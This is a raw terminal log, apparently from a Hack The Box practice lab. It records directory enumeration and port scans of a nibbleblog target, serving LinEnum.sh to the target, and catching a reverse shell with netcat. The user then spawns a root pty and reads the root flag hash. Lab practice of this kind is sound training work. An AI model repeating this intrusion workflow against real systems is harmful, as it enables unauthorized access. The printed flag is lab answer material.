┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ gobuster dir -u http://10.129.196.36/nibbleblog/admin -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.196.36/nibbleblog/admin
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 314]
/.hta (Status: 403) [Size: 309]
/.htaccess (Status: 403) [Size: 314]
/ajax (Status: 301) [Size: 330] [--> http://10.129.196.36/nibbleblog/admin/ajax/]
/boot (Status: 301) [Size: 330] [--> http://10.129.196.36/nibbleblog/admin/boot/]
/controllers (Status: 301) [Size: 337] [--> http://10.129.196.36/nibbleblog/admin/controllers/]
/js (Status: 301) [Size: 328] [--> http://10.129.196.36/nibbleblog/admin/js/]
/kernel (Status: 301) [Size: 332] [--> http://10.129.196.36/nibbleblog/admin/kernel/]
/templates (Status: 301) [Size: 335] [--> http://10.129.196.36/nibbleblog/admin/templates/]
/views (Status: 301) [Size: 331] [--> http://10.129.196.36/nibbleblog/admin/views/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ gobuster dir -u http://10.129.196.36/nibbleblog/content -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.196.36/nibbleblog/content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 316]
/.htpasswd (Status: 403) [Size: 316]
/.hta (Status: 403) [Size: 311]
/private (Status: 301) [Size: 335] [--> http://10.129.196.36/nibbleblog/content/private/]
/public (Status: 301) [Size: 334] [--> http://10.129.196.36/nibbleblog/content/public/]
/tmp (Status: 301) [Size: 331] [--> http://10.129.196.36/nibbleblog/content/tmp/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ gobuster dir -u http://10.129.196.36/nibbleblog/content/private -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.196.36/nibbleblog/content/private
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 324]
/.hta (Status: 403) [Size: 319]
/.htpasswd (Status: 403) [Size: 324]
/plugins (Status: 301) [Size: 343] [--> http://10.129.196.36/nibbleblog/content/private/plugins/]
Progress: 4750 / 4750 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ gobuster dir -u http://10.129.196.36/nibbleblog/content/private -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.78.128 netmask 255.255.255.0 broadcast 192.168.78.255
inet6 fe80::f52:8538:cb24:ad51 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:69:07:ae txqueuelen 1000 (Ethernet)
RX packets 707039 bytes 827123943 (788.8 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 200862 bytes 29003635 (27.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10 bytes 580 (580.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10 bytes 580 (580.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.44 netmask 255.255.254.0 destination 10.10.15.44
inet6 fe80::6428:da0e:7ec4:e099 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::112a prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 98162 bytes 18472838 (17.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 98687 bytes 7920697 (7.5 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ ifconfig
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:69:07:ae brd ff:ff:ff:ff:ff:ff
inet 192.168.78.128/24 brd 192.168.78.255 scope global dynamic noprefixroute eth0
valid_lft 1007sec preferred_lft 782sec
inet6 fe80::f52:8538:cb24:ad51/64 scope link
valid_lft forever preferred_lft forever
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ ip a show tun0
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.15.44/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::112a/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::6428:da0e:7ec4:e099/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:69:07:ae brd ff:ff:ff:ff:ff:ff
inet 192.168.78.128/24 brd 192.168.78.255 scope global dynamic noprefixroute eth0
valid_lft 1447sec preferred_lft 1222sec
inet6 fe80::f52:8538:cb24:ad51/64 scope link
valid_lft forever preferred_lft forever
5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.15.44/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::112a/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::6428:da0e:7ec4:e099/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ DDD
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles/nmap-scans]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ cd kn
cd: no such file or directory: kn
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~/htb-practice]
└─$ cd knowledge
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ cd nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open -p- -oA nmap_full_scan 10.129.230.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:26 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.32 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open -p- -oA nmap_full_scan 10.129.230.124
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ ping 10.129.230.124
PING 10.129.230.124 (10.129.230.124) 56(84) bytes of data.
From 192.168.78.128 icmp_seq=1 Destination Host Unreachable
From 192.168.78.128 icmp_seq=2 Destination Host Unreachable
From 192.168.78.128 icmp_seq=3 Destination Host Unreachable
^C
--- 10.129.230.124 ping statistics ---
3 packets transmitted, 0 received, +3 errors, 100% packet loss, time 2049ms
pipe 3
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open -p- -oA nmap_full_scan 10.129.230.124
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:35 EDT
Nmap scan report for 10.129.230.124
Host is up (0.020s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.54 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ ls
nmap_full_scan.gnmap nmap_full_scan.xml nmap_scan.nmap
nmap_full_scan.nmap nmap_scan.gnmap nmap_scan.xml
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ nmap -sV --open -p- -oA nmap_full_scan 10.129.230.124 -O
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 00:36 EDT
Nmap scan report for 10.129.230.124
Host is up (0.017s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge/nmap-scans]
└─$ cd ..
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ ls
nmap-scans
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ dpkg -l | grep copy
ii copyq 10.0.0-1 amd64 Advanced clipboard manager with editing and scripting features
ii copyq-plugins 10.0.0-1 amd64 Plugins for CopyQ
ii firebird4.0-common-doc 4.0.5.3140.ds6-17 all copyright, licensing and changelogs of firebird4.0
ii libclone-perl:amd64 0.47-1+b1 amd64 module for recursively copying Perl datatypes
ii liburcu8t64:amd64 0.15.2-2 amd64 userspace RCU (read-copy-update) library
ii python3-zombie-imp 0.0.3-1 all copy of the `imp` module that was removed in Python 3.12
ii rsync 3.4.1+ds1-3 amd64 fast, versatile, remote (and local) file-copying tool
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ copyq
^C^C^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:69:07:ae brd ff:ff:ff:ff:ff:ff
inet 192.168.78.128/24 brd 192.168.78.255 scope global dynamic noprefixroute eth0
valid_lft 1151sec preferred_lft 926sec
inet6 fe80::f52:8538:cb24:ad51/64 scope link
valid_lft forever preferred_lft forever
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.15.44/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::112a/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::8a2b:7b07:5d19:5b0d/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ cd .
┌──(kali-user㉿kali-linux)-[~/htb-practice/knowledge]
└─$ cd ../Nibbles
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ ls
LinEnum.sh new.php nmap-scans php-payload.php
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.129.63.204 - - [24/Jun/2025 03:38:10] "GET /LinEnum.sh HTTP/1.1" 200 -
----------------------------------------
Exception occurred during processing of request from ('10.129.63.204', 51004)
Traceback (most recent call last):
File "/usr/lib/python3.13/socketserver.py", line 697, in process_request_thread
self.finish_request(request, client_address)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/http/server.py", line 1317, in finish_request
self.RequestHandlerClass(request, client_address, self,
~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
directory=args.directory)
^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/http/server.py", line 672, in __init__
super().__init__(*args, **kwargs)
~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/socketserver.py", line 766, in __init__
self.handle()
~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 436, in handle
self.handle_one_request()
~~~~~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 424, in handle_one_request
method()
~~~~~~^^
File "/usr/lib/python3.13/http/server.py", line 679, in do_GET
self.copyfile(f, self.wfile)
~~~~~~~~~~~~~^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/http/server.py", line 878, in copyfile
shutil.copyfileobj(source, outputfile)
~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.13/shutil.py", line 204, in copyfileobj
fdst_write(buf)
~~~~~~~~~~^^^^^
File "/usr/lib/python3.13/socketserver.py", line 845, in write
self._sock.sendall(b)
~~~~~~~~~~~~~~~~~~^^^
BrokenPipeError: [Errno 32] Broken pipe
----------------------------------------
^C
Keyboard interrupt received, exiting.
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 8443
listening on [any] 8443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.63.204] 48208
# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@gettingstarted:/home/mrb3n# ls
ls
user.txt
root@gettingstarted:/home/mrb3n# cd ..
cd ..
root@gettingstarted:/home# ls
ls
mrb3n
root@gettingstarted:/home# cd ..
cd ..
root@gettingstarted:/# ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
root@gettingstarted:/# cd /home
cd /home
root@gettingstarted:/home# ls
ls
mrb3n
root@gettingstarted:/home# cd mrb3n
cd mrb3n
root@gettingstarted:/home/mrb3n# ls
ls
user.txt
root@gettingstarted:/home/mrb3n# cd ..
cd ..
root@gettingstarted:/home# cd ..
cd ..
root@gettingstarted:/# ls
ls
bin cdrom etc lib lib64 lost+found mnt proc run snap sys usr
boot dev home lib32 libx32 media opt root sbin srv tmp var
root@gettingstarted:/# find . -f "root.txt"
find . -f "root.txt"
find: unknown predicate `-f'
root@gettingstarted:/# find -iname root.txt
find -iname root.txt
./root/root.txt
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 8443
listening on [any] 8443 ...
connect to [10.10.15.44] from (UNKNOWN) [10.129.63.204] 48232
# python3 -c 'import pty; pty.spawn("/bin/bash")'
root@gettingstarted:/home/mrb3n# cd /root
cd /root
root@gettingstarted:~# ls
ls
root.txt snap
root@gettingstarted:~# cat root.txt
cat root.txt
f1fba6e9f71efb2630e6e34da6387842
root@gettingstarted:~# Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib/python3.8/pty.py", line 166, in spawn
_copy(master_fd, master_read, stdin_read)
File "/usr/lib/python3.8/pty.py", line 137, in _copy
rfds, wfds, xfds = select(fds, [], [])
KeyboardInterrupt
#
# exit
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo systemctl start ssh
[sudo] password for kali-user:
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: dis>
Active: active (running) since Tue 2025-06-24 04:31:17 EDT; 3s ago
Invocation: fa7977a6ba8949759a7a73a12b739544
Docs: man:sshd(8)
man:sshd_config(5)
Process: 2186673 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCC>
Main PID: 2186676 (sshd)
Tasks: 1 (limit: 9337)
Memory: 2.1M (peak: 2.6M)
CPU: 34ms
CGroup: /system.slice/ssh.service
└─2186676 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
Jun 24 04:31:17 kali-linux systemd[1]: Starting ssh.service - OpenBSD Secure Sh>
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on 0.0.0.0 port 22.
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on :: port 22.
Jun 24 04:31:17 kali-linux systemd[1]: Started ssh.service - OpenBSD Secure She>
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.78.2 0.0.0.0 UG 0 0 0 eth0
10.10.10.0 10.10.14.1 255.255.254.0 UG 0 0 0 tun0
10.10.14.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.14.1 255.255.0.0 UG 0 0 0 tun0
192.168.78.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nmap 10.10.15.44
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 04:31 EDT
Nmap scan report for 10.10.15.44
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:69:07:ae brd ff:ff:ff:ff:ff:ff
inet 192.168.78.128/24 brd 192.168.78.255 scope global dynamic noprefixroute eth0
valid_lft 1307sec preferred_lft 1082sec
inet6 fe80::f52:8538:cb24:ad51/64 scope link
valid_lft forever preferred_lft forever
7: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
link/none
inet 10.10.15.44/23 scope global tun0
valid_lft forever preferred_lft forever
inet6 dead:beef:2::112a/64 scope global
valid_lft forever preferred_lft forever
inet6 fe80::8a2b:7b07:5d19:5b0d/64 scope link stable-privacy proto kernel_ll
valid_lft forever preferred_lft forever
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nmap 192.168.78.128
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-24 04:32 EDT
Nmap scan report for 192.168.78.128
Host is up (0.0000030s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.10 seconds
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo nano /etc/ssh/sshd_config
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ cat /etc/ssh/sshd_config | grep -i password
#PermitRootLogin prohibit-password
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# PasswordAuthentication. Depending on your PAM configuration,
# the setting of "PermitRootLogin prohibit-password".
# PAM authentication, then enable this but set PasswordAuthentication
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo nano /etc/ssh/sshd_config
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo systemctl status ssh
● ssh.service - OpenBSD Secure Shell server
Loaded: loaded (/usr/lib/systemd/system/ssh.service; disabled; preset: dis>
Active: active (running) since Tue 2025-06-24 04:31:17 EDT; 12min ago
Invocation: fa7977a6ba8949759a7a73a12b739544
Docs: man:sshd(8)
man:sshd_config(5)
Process: 2186673 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCC>
Main PID: 2186676 (sshd)
Tasks: 1 (limit: 9337)
Memory: 2.1M (peak: 2.6M)
CPU: 34ms
CGroup: /system.slice/ssh.service
└─2186676 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
Jun 24 04:31:17 kali-linux systemd[1]: Starting ssh.service - OpenBSD Secure Sh>
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on 0.0.0.0 port 22.
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on :: port 22.
Jun 24 04:31:17 kali-linux systemd[1]: Started ssh.service - OpenBSD Secure She>
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw allow 22
sudo: ufw: command not found
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw status
sudo: ufw: command not found
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo apt install ufw
Installing:
ufw
Suggested packages:
rsyslog
Summary:
Upgrading: 0, Installing: 1, Removing: 0, Not Upgrading: 0
Download size: 169 kB
Space needed: 880 kB / 76.6 GB available
Get:1 http://kali.download/kali kali-rolling/main amd64 ufw all 0.36.2-9 [169 kB]
Fetched 169 kB in 0s (1,021 kB/s)
Preconfiguring packages ...
Selecting previously unselected package ufw.
(Reading database ... 417390 files and directories currently installed.)
Preparing to unpack .../archives/ufw_0.36.2-9_all.deb ...
Unpacking ufw (0.36.2-9) ...
Setting up ufw (0.36.2-9) ...
Creating config file /etc/ufw/before.rules with new version
Creating config file /etc/ufw/before6.rules with new version
Creating config file /etc/ufw/after.rules with new version
Creating config file /etc/ufw/after6.rules with new version
update-rc.d: We have no instructions for the ufw init script.
update-rc.d: It looks like a non-network service, we enable it.
Created symlink '/etc/systemd/system/multi-user.target.wants/ufw.service' → '/us
r/lib/systemd/system/ufw.service'.
Processing triggers for kali-menu (2025.2.3) ...
Processing triggers for man-db (2.13.1-1) ...
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw status
Status: inactive
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw disable
Firewall stopped and disabled on system startup
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ iptables -L
iptables v1.8.11 (nf_tables): Could not fetch rule set generation id: Permission denied (you must be root)
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -zv 10.10.15.44 22
10.10.15.44: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.15.44] 22 (ssh) open
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo journalctl -u ssh
Jun 24 04:31:17 kali-linux systemd[1]: Starting ssh.service - OpenBSD Secure Sh>
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on 0.0.0.0 port 22.
Jun 24 04:31:17 kali-linux sshd[2186676]: Server listening on :: port 22.
Jun 24 04:31:17 kali-linux systemd[1]: Started ssh.service - OpenBSD Secure She>
Jun 24 04:46:01 kali-linux sshd-session[2194886]: Connection closed by 10.10.15>
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw allow ssh
Rules updated
Rules updated (v6)
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ iptables -L
iptables v1.8.11 (nf_tables): Could not fetch rule set generation id: Permission denied (you must be root)
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ sudo ufw enable
Firewall is active and enabled on system startup
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$ nc -nvlp 4444
listening on [any] 4444 ...
^C
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$
┌──(kali-user㉿kali-linux)-[~/htb-practice/Nibbles]
└─$